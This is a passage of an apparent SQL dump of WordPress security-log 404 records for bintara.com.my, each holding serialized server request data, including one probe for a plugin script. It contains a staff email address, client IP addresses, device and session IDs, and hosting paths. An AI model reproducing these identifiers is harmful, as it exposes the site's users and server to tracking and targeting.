XaZy8szD-tBfd7-tNTIf0AAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571189490.8677\";s:12:\"REQUEST_TIME\";s:10:\"1571189490\";}}','notice','2019-10-16 01:31:32','2019-10-16 01:31:31',35355696,37152920,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'183.171.85.190'),(28100,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/robots/txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"72-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"72-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/robots/txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/robots/txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZykl0LDF77y37oISrH4QAAAAE\";s:12:\"REDIRECT_URL\";s:11:\"/robots/txt\";s:11:\"REMOTE_ADDR\";s:15:\"113.210.179.212\";s:11:\"REMOTE_PORT\";s:5:\"44075\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/robots/txt\";s:10:\"SCRIPT_URL\";s:11:\"/robots/txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZykl0LDF77y37oISrH4QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571189394.16\";s:12:\"REQUEST_TIME\";s:10:\"1571189394\";}}','notice','2019-10-16 01:29:55','2019-10-16 01:29:54',35036272,36840488,'https://bintara.com.my/robots/txt',1,0,'113.210.179.212'),(28099,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"6D1FA3BC-D365-46C2-97F8-B45983BE9CF8\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZyKV0LDF77y37oISrHbAAAAE0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.190\";s:11:\"REMOTE_PORT\";s:5:\"60104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZyKV0LDF77y37oISrHbAAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571189289.3635\";s:12:\"REQUEST_TIME\";s:10:\"1571189289\";}}','notice','2019-10-16 01:28:12','2019-10-16 01:28:09',35739520,37546088,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.190'),(28098,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=11&title=XXXXX\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=11&title=XXXXX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.148.100\";s:11:\"REMOTE_PORT\";s:5:\"20026\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZwfa@51JdM-xtx2nJLKQAAAY4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571188861.4144\";s:12:\"REQUEST_TIME\";s:10:\"1571188861\";}}','notice','2019-10-16 01:21:05','2019-10-16 01:21:01',35424184,37232776,'https://bintara.com.my/?page_id=11&title=XXXXX',1,0,'54.36.148.100'),(28097,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"04E2E175-2ADD-4274-9B00-677719362AF3\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZtR6J3enRcCPZdox7@WAAAAdc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.85.190\";s:11:\"REMOTE_PORT\";s:5:\"38006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZtR6J3enRcCPZdox7@WAAAAdc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571188039.9239\";s:12:\"REQUEST_TIME\";s:10:\"1571188039\";}}','notice','2019-10-16 01:07:21','2019-10-16 01:07:20',35342376,37142504,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.85.190'),(28096,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{B9424AD2-63E8-4131-8DAE-C80322D36F86}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3E8A463F-88E9-49A0-8260-899E887B2B01\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZmeqJ3enRcCPZdox75ngAAAcs\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"14.192.215.239\";s:11:\"REMOTE_PORT\";s:4:\"2648\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZmeqJ3enRcCPZdox75ngAAAcs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571186298.4868\";s:12:\"REQUEST_TIME\";s:10:\"1571186298\";}}','notice','2019-10-16 00:38:21','2019-10-16 00:38:18',35734072,37536984,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'14.192.215.239'),(28095,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:91:\"/wp2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:113:\"https://bintara.com.my/wp2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:91:\"/wp2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaZWNHTLTfzmaEv6rGK0gAAAANQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:113:\"https://bintara.com.my/wp2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:91:\"/wp2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZWNHTLTfzmaEv6rGK0gAAAANQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"51051\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:113:\"https://bintara.com.my/wp2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:91:\"/wp2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZWNHTLTfzmaEv6rGK0gAAAANQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571182132.7043\";s:12:\"REQUEST_TIME\";s:10:\"1571182132\";}}','notice','2019-10-15 23:28:55','2019-10-15 23:28:53',35679432,37477736,'https://bintara.com.my/wp2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'51.255.43.81'),(28094,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.161.131.48\";s:11:\"REMOTE_PORT\";s:5:\"55569\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZSzNwSqwmg3BSzc7@-IwAAAgo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571181260.4589\";s:12:\"REQUEST_TIME\";s:10:\"1571181260\";}}','notice','2019-10-15 23:14:23','2019-10-15 23:14:20',35426496,37228664,'https://bintara.com.my/?page_id=18',1,0,'108.161.131.48'),(28030,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 JuziBrowser\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.255.152.117\";s:11:\"REMOTE_PORT\";s:5:\"61941\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaSMcGfO-tVFZ234mVhbQQAAAAo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571064944.2861\";s:12:\"REQUEST_TIME\";s:10:\"1571064944\";}}','notice','2019-10-14 14:55:47','2019-10-14 14:55:44',35469688,37278456,'https://bintara.com.my/?page_id=18',1,0,'178.255.152.117'),(29007,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//gjxq/jpry/masuc.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 